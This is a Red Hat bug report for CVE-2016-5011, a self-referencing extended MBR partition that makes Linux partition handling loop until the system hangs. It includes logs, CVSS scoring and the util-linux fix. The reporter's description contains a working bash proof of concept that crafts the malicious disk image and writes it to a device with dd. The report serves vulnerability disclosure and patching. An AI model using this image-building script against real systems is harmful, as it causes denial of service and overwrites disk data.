Bug 1349536

Summary: Extended partition loop in MBR partition table leads to DOS
Product: Red Hat Enterprise Linux 7 Reporter: Michael Gruhn <michael.gruhn>
Component: util-linuxAssignee: Karel Zak <kzak>
Status: CLOSED ERRATA QA Contact: Vaclav Danek <vdanek>
Severity: low Docs Contact:
Priority: unspecified    
Version: 7.2CC: anemec, cbuissar, kvolny, michael.gruhn, security-response-team, todoleza, vdanek
Target Milestone: rcKeywords: Security
Target Release: ---   
Hardware: Unspecified   
OS: Linux   
Whiteboard:
Fixed In Version: util-linux-2.23.2-32.el7 Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2016-11-03 21:27:30 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On:    
Bug Blocks: 1349741    

Description Michael Gruhn 2016-06-23 15:57:52 UTC
Created attachment 1171579 [details]
Exploit disk image (use with care ... it is hard to get rid of with just Linux)

Description of problem:
=======================
By connecting a storage medium containing a specially crafted MBR a local user can cause a Linux system to become unresponsive.

Version-Release number of selected component (if applicable):
=============================================================
CentOS 7
RHEL 7
Ubuntu 14.04
possibly every Linux system

How reproducible:
=================
Always

Steps to Reproduce:
===================
Generate an MBR with two partitions. One primary and one extended. Point the extended partition to the MBR itself.
This generates a loop that will cause a Linux system to repeatedly generate device nodes for the primary partition in the MBR.

Such a prepared disk images can be generated via:
"""
#!/bin/bash
dd if=/dev/zero of=deathmoch.dd bs=512 count=3
(echo x; echo c; echo 42; echo r; echo n; echo p; echo 1; echo 1; echo 1; echo n; echo e; echo 2; echo 2; echo w) | fdisk deathmoch.dd
xxd -ps deathmoch.dd | sed -s 's/830002000100000001000000000003000500030002000000010000000000/830002000100000001000000000003000500030000000000010000000000/' | xxd -r -ps > deathmoch_active.dd
# deathmoch_active.dd now contains the image with the extended partition loop
# you can now trigger the DOS by dd'ing the activated deathmoch onto a
# USB stick (but also HDDs work)
dd if=deathmoch_active.dd of=/dev/sdSELECTLETTER
"""

Actual results:
===============
Ultimately the system becomes unresponsive. Because the system generates sdb sdb1 sdb2 sdb3 ... sdb157 devices nodes (and presumably even more).
This can be seen from /var/log/kern (see end of report for logs).

Expected results:
=================
System should detect the loop and only generate sdb and sdb1

Additional info:
================

Possibly systemd-udevd could be the culprit, because its activity spikes up on connecting such a prepared storage device (hence systemd was reported as the component, but maybe the underlying cause is the received kevents that caused by repeatedly generating device nodes). See output of top at end of report.

On Ubuntu 14.04 the Out-Of-Memory-Killer eventually kills the systemd-udevd process and the system can recover once the storage device is remove. However, on a Red Hat based system this is not the case.

Security Impact:
================

4.3 (Medium)

CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C

Personally, however, we regard the security impact to be low.

Original discoverer:
====================

Christian Moch

Logs:
====

/var/log/kern
"""
Jun 23 16:27:48 localhost kernel: usb 2-2: new SuperSpeed USB device number 2 using xhci_hcd
Jun 23 16:27:48 localhost kernel: usb 2-2: New USB device found, idVendor=XXXX, idProduct=XXXX
Jun 23 16:27:48 localhost kernel: usb 2-2: New USB device strings: Mfr=X, Product=X, SerialNumber=X
Jun 23 16:27:48 localhost kernel: usb 2-2: Product: Mass Storage Device
Jun 23 16:27:48 localhost kernel: usb 2-2: Manufacturer: XXX
Jun 23 16:27:48 localhost kernel: usb 2-2: SerialNumber: XXX
Jun 23 16:27:48 localhost kernel: usb-storage 2-2:1.0: USB Mass Storage device detected
Jun 23 16:27:48 localhost kernel: scsi host7: usb-storage 2-2:1.0
Jun 23 16:27:49 localhost kernel: scsi 7:0:0:0: Direct-Access     XXX    1.00 PQ: 0 ANSI: 6
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: Attached scsi generic sg1 type 0
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] 15433728 512-byte logical blocks: (7.90 GB/7.35 GiB)
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] Write Protect is off
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] Mode Sense: 23 00 00 00
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] Write cache: disabled, read cache: disabled, doesn't support DPO or FUA
Jun 23 16:27:49 localhost kernel:  sdb: sdb1 sdb2 < sdb5 sdb6 sdb7 sdb8 sdb9 sdb10 sdb11 sdb12 sdb13 sdb14 sdb15 sdb16 sdb17 sdb18 sdb19 sdb20 sdb21 sdb22 sdb23 sdb24 sdb25 sdb26 sdb27 sdb28 sdb29 sdb30 sdb31 sdb32 sdb33 sdb34 sdb35 sdb36 sdb37 sdb38 sdb39 sdb40 sdb41 sdb42 sdb43 sdb44 sdb45 sdb46 sdb47 sdb48 sdb49 sdb50 sdb51 sdb52 sdb53 sdb54 sdb55 sdb56 sdb57 sdb58 sdb59 sdb60 sdb61 sdb62 sdb63 sdb64 sdb65 sdb66 sdb67 sdb68 sdb69 sdb70 sdb71 sdb72 sdb73 sdb74 sdb75 sdb76 sdb77 sdb78 sdb79 sdb80 sdb81 sdb82 sdb83 sdb84 sdb85 sdb86 sdb87 sdb88 sdb89 sdb90 sdb91 sdb92 sdb93 sdb94 sdb95 sdb96 sdb97 sdb98 sdb99 sdb100 sdb101 sdb102 sdb103 sdb104 sdb105 sdb106 sdb107 sdb108 sdb109 sdb110 sdb111 sdb112 sdb113 sdb114 sdb115 sdb116 sdb117 sdb118 sdb119 sdb120 sdb121 sdb122 sdb123 sdb124 sdb125 sdb126 sdb127 sdb128 sdb129 sdb130 sdb131 sdb132 sdb133 sdb134 sdb135 sdb136 sdb137 sdb138 sdb139 sdb140 sdb141 sdb142 sdb143 sdb144 sdb145 sdb146 sdb147 sdb148 sdb149 sdb150 sdb151 sdb152 sdb153 sdb154 sdb155 sdb156 sdb157 
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] Attached SCSI removable disk
"""

top:
"""
top - 16:56:09 up 24 min,  1 user,  load average: 1.35, 0.36, 0.22
Tasks: 202 total,  17 running, 185 sleeping,   0 stopped,   0 zombie
%Cpu(s): 26.1 us, 25.7 sy,  0.0 ni, 47.8 id,  0.3 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem : 16126124 total,  7168680 free,  8342044 used,   615400 buff/cache
KiB Swap:  8390652 total,  8390652 free,        0 used.  7455464 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
 2675 root      20   0  540844 498196   1484 R  14.0  3.1   0:00.42 systemd-udevd
 2688 root      20   0  554300 510976    812 R  13.6  3.2   0:00.41 systemd-udevd
 2694 root      20   0  549232 505720    788 R  13.6  3.1   0:00.41 systemd-udevd
 2695 root      20   0  540160 496744    788 R  13.0  3.1   0:00.39 systemd-udevd
 2692 root      20   0  532980 489972   1196 R  12.6  3.0   0:00.38 systemd-udevd
 2693 root      20   0  531884 488916   1192 R  12.6  3.0   0:00.38 systemd-udevd
 2704 root      20   0  517308 473756    788 R  12.3  2.9   0:00.37 systemd-udevd
 2696 root      20   0  510712 467176    788 R  12.0  2.9   0:00.36 systemd-udevd
 2697 root      20   0  513744 470320    788 R  12.0  2.9   0:00.36 systemd-udevd
 2698 root      20   0  513240 469792    788 R  12.0  2.9   0:00.36 systemd-udevd
 2699 root      20   0  510624 467152    788 R  12.0  2.9   0:00.36 systemd-udevd
 2701 root      20   0  510120 466624    788 R  12.0  2.9   0:00.36 systemd-udevd
 2702 root      20   0  512088 468736    788 R  12.0  2.9   0:00.36 systemd-udevd
 2705 root      20   0  512348 469004    788 R  12.0  2.9   0:00.36 systemd-udevd
 2700 root      20   0  505840 462400    788 R  11.6  2.9   0:00.35 systemd-udevd
 2703 root      20   0  508804 465308    788 R  11.6  2.9   0:00.35 systemd-udevd
  879 root      20   0   47096   5616   2728 S   1.0  0.0   0:00.94 systemd-udevd
  850 root      20   0   36968   5192   4868 S   0.7  0.0   0:00.30 systemd-journal
 2584 root      20   0       0      0      0 S   0.7  0.0   0:00.28 kworker/u16:1
   43 root      20   0       0      0      0 S   0.3  0.0   0:00.01 kdevtmpfs
 2270 XXXX      20   0 1434028 471856  60568 S   0.3  2.9   2:17.63 firefox
 2674 XXXX      20   0  157672   2204   1536 R   0.3  0.0   0:00.02 top
[...]
"""

Comment 3 Cedric Buissart 2016-06-30 08:44:46 UTC
Currently re-attaching this to util-linux.


=> Currently, partx loops for a while, and triggers an assertion as well as an OOM kill :

# dmesg -c
# time partx /dev/loop0
partx: disk-utils/partx.c:564: add_tt_line: Assertion `par' failed.
Killed

real    0m40.993s
user    0m0.520s
sys     0m7.478s
# dmesg | grep -A1 "Out of memory:"
[235537.790468] Out of memory: Kill process 12459 (partx) score 847 or sacrifice child
[235537.790505] Killed process 12459 (partx) total-vm:1796284kB, anon-rss:881108kB, file-rss:4kB


=> Patch prevents that :
# yum update ./{libblkid,libmount,libuuid,util-linux}*.rpm
# time partx /dev/loop0
NR START END SECTORS SIZE NAME UUID
 1     1   1       1 512B     
 2     0   0       1 512B     
 5     1   1       1 512B     

real    0m0.003s
user    0m0.000s
sys     0m0.003s

Comment 4 Cedric Buissart 2016-07-04 14:18:49 UTC
A CVE has been assign for this issue : CVE-2016-5011

Comment 5 Karel Zak 2016-07-07 07:55:37 UTC
And kernel is fine with the partition table? The message

   sdb: sdb1 sdb2 < sdb5 ...

is from kernel and I guess it generates event for each detected partition.

Comment 6 Karel Zak 2016-07-07 12:28:56 UTC
Fixed (libblkid) by upstream commit 7164a1c34d18831ac61c6744ad14ce916d389b3f.

Comment 7 Cedric Buissart 2016-07-11 08:00:50 UTC
(In reply to Karel Zak from comment #5)
> And kernel is fine with the partition table? The message
> 
>    sdb: sdb1 sdb2 < sdb5 ...
> 
> is from kernel and I guess it generates event for each detected partition.

Yes, the kernel will loop until the limit set in {struct parsed_partitions} is reached. That limit is decided by the disk_max_parts() function. So it might be annoying, but wont be infinite (parse_extended() in msdos.c -> http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/block/partitions/msdos.c#n120 )

Comment 12 Andrej Nemec 2016-07-13 13:37:06 UTC
(In reply to Michael Gruhn from comment #0)
> Security Impact:
> ================
> 
> 4.3 (Medium)
> 
> CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C
> 
> Personally, however, we regard the security impact to be low.
> 

Hi, just a quick question. Why is the user interaction needed for this to trigger? Afaik the only requirement here is to have a malicious storage medium and insert it, no action should be needed from the victim?

Wouldn't a better CVSS vector be this?

4.3 (Medium)

CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C

Thanks

Comment 13 Michael Gruhn 2016-07-13 14:11:29 UTC
(In reply to Andrej Nemec from comment #12)
> Wouldn't a better CVSS vector be this?
> 
> 4.3 (Medium)
> 
> CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C
> 
> Thanks

Yes, you are correct. On both PR:L and UI:N.

Comment 14 Cedric Buissart 2016-07-14 11:18:17 UTC
(In reply to Michael Gruhn from comment #13)
> (In reply to Andrej Nemec from comment #12)
> > Wouldn't a better CVSS vector be this?
> > 
> > 4.3 (Medium)
> > 
> > CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C
> > 
> > Thanks
> 
> Yes, you are correct. On both PR:L and UI:N.

I would keep PR=N => the attack does not require any privilege & works even if no one is logged in.

4.6: 
CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C

Comment 15 Andrej Nemec 2016-07-14 11:20:23 UTC
> I would keep PR=N => the attack does not require any privilege & works even
> if no one is logged in.
> 
> 4.6: 
> CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C

Ack, after a thorough discussion this is the correct score.

We will be using:

4.6/CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Comment 16 Vaclav Danek 2016-09-27 11:57:18 UTC
Verified both reproducers on util-linux-2.23.2-33.el7.x86_64.
=> Verified

Comment 18 errata-xmlrpc 2016-11-03 21:27:30 UTC
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory, and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://rhn.redhat.com/errata/RHSA-2016-2605.html